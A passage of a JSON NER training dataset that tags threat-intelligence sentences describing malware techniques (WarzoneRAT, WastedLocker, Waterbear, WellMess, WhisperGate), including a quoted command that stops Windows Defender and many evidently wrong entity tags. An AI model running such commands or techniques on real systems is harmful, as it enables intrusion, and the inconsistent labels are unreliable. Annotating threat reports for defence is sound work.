"(2.0)", - "Service.\"" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "use", - "`sdclt.exe`", - "to", - "bypass", - "UAC", - "in", - "Windows", - "10", - "to", - "escalate", - "privileges;", - "for", - "older", - "Windows", - "versions", - "WarzoneRAT", - "can", - "use", - "the", - "IFileOperation", - "exploit", - "to", - "bypass", - "the", - "UAC", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "perform", - "COM", - "hijacking", - "by", - "setting", - "the", - "path", - "to", - "itself", - "to", - "the", - "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", - "key", - "with", - "a", - "`DelegateExecute`", - "parameter." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "capability", - "to", - "grab", - "passwords", - "from", - "numerous", - "web", - "browsers", - "as", - "well", - "as", - "from", - "Outlook", - "and", - "Thunderbird", - "email", - "clients." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "use", - "XOR", - "0x45", - "to", - "decrypt", - "obfuscated", - "code." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "disarm", - "Windows", - "Defender", - "during", - "the", - "UAC", - "process", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "send", - "collected", - "victim", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "enumerate", - "directories", - "on", - "a", - "compromise", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "ability", - "of", - "performing", - "remote", - "desktop", - "access", - "via", - "a", - "hVNC", - "window", - "for", - "decreased", - "visibility." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "masquerade", - "the", - "Process", - "Environment", - "Block", - "on", - "a", - "compromised", - "host", - "to", - "hide", - "it's", - "attempts", - "to", - "elevate", - "privileges", - "through", - "`IFileOperation`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "capability", - "to", - "install", - "a", - "live", - "and", - "offline", - "keylogger,", - "including", - "through", - "the", - "use", - "of", - "the", - "`GetAsyncKeyState`", - "Windows", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "relied", - "on", - "a", - "victim", - "to", - "open", - "a", - "malicious", - "attachment", - "within", - "an", - "email", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "create", - "`HKCU\\Software\\Classes\\Folder\\shell\\open\\command`", - "as", - "a", - "new", - "registry", - "key", - "during", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "use", - "a", - "variety", - "of", - "API", - "calls", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "communicate", - "with", - "its", - "C2", - "server", - "via", - "TCP", - "over", - "port", - "5200." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "use", - "PowerShell", - "to", - "download", - "files", - "and", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "obtain", - "a", - "list", - "of", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "ability", - "to", - "inject", - "malicious", - "DLLs", - "into", - "a", - "specific", - "process", - "for", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "capability", - "to", - "act", - "as", - "a", - "reverse", - "proxy." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "add", - "itself", - "to", - "the", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "and", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UIF2IS20VK`", - "Registry", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "ability", - "to", - "control", - "an", - "infected", - "PC", - "using", - "RDP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "include", - "a", - "rootkit", - "to", - "hide", - "processes,", - "files,", - "and", - "startup." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "been", - "distributed", - "as", - "a", - "malicious", - "attachment", - "within", - "an", - "email." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "encrypt", - "its", - "C2", - "with", - "RC4", - "with", - "the", - "password", - "`warzone160\\x00`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "collect", - "compromised", - "host", - "information,", - "including", - "OS", - "version,", - "PC", - "name,", - "RAM", - "size,", - "and", - "CPU", - "details." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "been", - "install", - "via", - "template", - "injection", - "through", - "a", - "malicious", - "DLL", - "embedded", - "within", - "a", - "template", - "RTF", - "in", - "a", - "Word", - "document." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "has", - "the", - "ability", - "of", - "performing", - "remote", - "desktop", - "access", - "via", - "a", - "VNC", - "console." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "access", - "the", - "webcam", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WarzoneRAT", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "contains", - "junk", - "code", - "to", - "increase", - "its", - "entropy", - "and", - "hide", - "the", - "actual", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "perform", - "a", - "UAC", - "bypass", - "if", - "it", - "is", - "not", - "executed", - "with", - "administrator", - "rights", - "or", - "if", - "the", - "infected", - "host", - "runs", - "Windows", - "Vista", - "or", - "later." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "has", - "performed", - "DLL", - "hijacking", - "before", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "encrypt", - "data", - "and", - "leave", - "a", - "ransom", - "note." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "WastedLocker's", - "custom", - "cryptor,", - "CryptOne,", - "used", - "an", - "XOR", - "based", - "algorithm", - "to", - "decrypt", - "the", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "WastedLocker", - "payload", - "includes", - "encrypted", - "strings", - "stored", - "within", - "the", - ".bss", - "section", - "of", - "the", - "binary", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "enumerate", - "files", - "and", - "directories", - "just", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "has", - "copied", - "a", - "random", - "file", - "from", - "the", - "Windows", - "System32", - "folder", - "to", - "the", - "<code>%APPDATA%</code>", - "location", - "under", - "a", - "different", - "hidden", - "filename." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "delete", - "shadow", - "volumes." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "modify", - "registry", - "values", - "within", - "the", - "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Internet", - "Settings\\ZoneMap</code>", - "registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "has", - "the", - "ability", - "to", - "save", - "and", - "execute", - "files", - "as", - "an", - "alternate", - "data", - "stream", - "(ADS)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker's", - "custom", - "crypter,", - "CryptOne,", - "leveraged", - "the", - "VirtualAlloc()", - "API", - "function", - "to", - "help", - "execute", - "the", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "identify", - "network", - "adjacent", - "and", - "accessible", - "drives." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "enumerate", - "removable", - "drives", - "prior", - "to", - "the", - "encryption", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "checks", - "for", - "specific", - "registry", - "keys", - "related", - "to", - "the", - "<code>UCOMIEnumConnections</code>", - "and", - "<code>IActiveScriptParseProcedure32</code>", - "interfaces." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "can", - "execute", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "checked", - "if", - "UCOMIEnumConnections", - "and", - "IActiveScriptParseProcedure32", - "Registry", - "keys", - "were", - "detected", - "as", - "part", - "of", - "its", - "anti-analysis", - "technique." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "has", - "used", - "cmd", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "has", - "a", - "command", - "to", - "take", - "ownership", - "of", - "a", - "file", - "and", - "reset", - "the", - "ACL", - "permissions", - "using", - "the", - "<code>takeown.exe", - "/F", - "filepath</code>", - "command." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "WastedLocker", - "created", - "and", - "established", - "a", - "service", - "that", - "runs", - "until", - "the", - "encryption", - "process", - "is", - "complete." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "has", - "used", - "DLL", - "side", - "loading", - "to", - "import", - "and", - "load", - "a", - "malicious", - "DLL", - "loader." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "has", - "the", - "ability", - "to", - "decrypt", - "its", - "RC4", - "encrypted", - "payload", - "for", - "execution." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "has", - "used", - "RC4", - "encrypted", - "shellcode", - "and", - "encrypted", - "functions." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "hook", - "the", - "<code>ZwOpenProcess</code>", - "and", - "<code>GetExtendedTcpTable</code>", - "APIs", - "called", - "by", - "the", - "process", - "of", - "a", - "security", - "product", - "to", - "hide", - "PIDs", - "and", - "TCP", - "records", - "from", - "detection." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "scramble", - "functions", - "not", - "to", - "be", - "executed", - "again", - "with", - "random", - "values." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "receive", - "and", - "load", - "executables", - "from", - "remote", - "C2", - "servers." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "has", - "deleted", - "certain", - "values", - "from", - "the", - "Registry", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "leverage", - "API", - "functions", - "for", - "execution." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "identify", - "the", - "process", - "for", - "a", - "specific", - "security", - "product." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "inject", - "decrypted", - "shellcode", - "into", - "the", - "LanmanServer", - "service." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "query", - "the", - "Registry", - "key", - "<code>\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"</code>", - "to", - "see", - "if", - "the", - "value", - "`OracleOcilib`", - "exists." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "find", - "the", - "presence", - "of", - "a", - "specific", - "security", - "software." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "use", - "API", - "hooks", - "on", - "`GetExtendedTcpTable`", - "to", - "retrieve", - "a", - "table", - "containing", - "a", - "list", - "of", - "TCP", - "endpoints", - "available", - "to", - "the", - "application." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Waterbear", - "can", - "use", - "thread", - "injection", - "to", - "inject", - "shellcode", - "into", - "the", - "process", - "of", - "security", - "software." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "archive", - "files", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "use", - "hard", - "coded", - "client", - "and", - "certificate", - "authority", - "certificates", - "to", - "communicate", - "with", - "C2", - "over", - "mutual", - "TLS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "exfiltrate", - "files", - "from", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "decompress", - "scripts", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "receive", - "data", - "and", - "executable", - "scripts", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "use", - "TCP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "has", - "been", - "observed", - "using", - "TCP", - "port", - "25,", - "without", - "using", - "SMTP,", - "to", - "leverage", - "an", - "open", - "port", - "for", - "secure", - "command", - "and", - "control", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "identify", - "the", - "IP", - "address", - "of", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMail", - "can", - "identify", - "the", - "current", - "username", - "on", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "communicate", - "to", - "C2", - "with", - "mutual", - "TLS", - "where", - "client", - "and", - "server", - "mutually", - "check", - "certificates." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "has", - "the", - "ability", - "to", - "use", - "DNS", - "tunneling", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "send", - "files", - "from", - "the", - "victim", - "machine", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "decode", - "and", - "decrypt", - "data", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "identify", - "domain", - "group", - "membership", - "for", - "the", - "current", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "write", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "use", - "junk", - "data", - "in", - "the", - "Base64", - "string", - "for", - "additional", - "obfuscation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "execute", - "PowerShell", - "scripts", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "has", - "used", - "Base64", - "encoding", - "to", - "uniquely", - "identify", - "communication", - "to", - "and", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "encrypt", - "HTTP", - "POST", - "data", - "using", - "RC6", - "and", - "a", - "dynamically", - "generated", - "AES", - "key", - "encrypted", - "with", - "a", - "hard", - "coded", - "RSA", - "public", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "identify", - "the", - "computer", - "name", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "identify", - "the", - "IP", - "address", - "and", - "user", - "domain", - "on", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "collect", - "the", - "username", - "on", - "the", - "victim", - "machine", - "to", - "send", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WellMess", - "can", - "execute", - "command", - "line", - "scripts", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wevtutil", - "can", - "be", - "used", - "to", - "clear", - "system", - "and", - "security", - "event", - "logs", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wevtutil", - "can", - "be", - "used", - "to", - "export", - "events", - "from", - "a", - "specific", - "log." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wevtutil", - "can", - "be", - "used", - "to", - "disable", - "specific", - "event", - "logs", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "overwrites", - "the", - "MBR", - "with", - "a", - "bootloader", - "component", - "that", - "performs", - "destructive", - "wiping", - "operations", - "on", - "hard", - "drives", - "and", - "displays", - "a", - "fake", - "ransom", - "note", - "when", - "the", - "host", - "boots." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "WhisperGate", - "third", - "stage", - "can", - "use", - "the", - "AdvancedRun.exe", - "tool", - "to", - "execute", - "commands", - "in", - "the", - "context", - "of", - "the", - "Windows", - "TrustedInstaller", - "group", - "via", - "`%TEMP%\\AdvancedRun.exe\"", - "/EXEFilename", - "\"C:\\Windows\\System32\\sc.exe\"", - "/WindowState", - "0", - "/CommandLine", - "\"stop", - "WinDefend\"", - "/StartDirectory", - "\"\"", - "/RunAs", - "8", - "/Run`." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WhisperGate", - "can", - "corrupt", - "files", - "by", - "overwriting", - "the", - "first", - "1", - "MB", - "with", - "`0xcc`", - 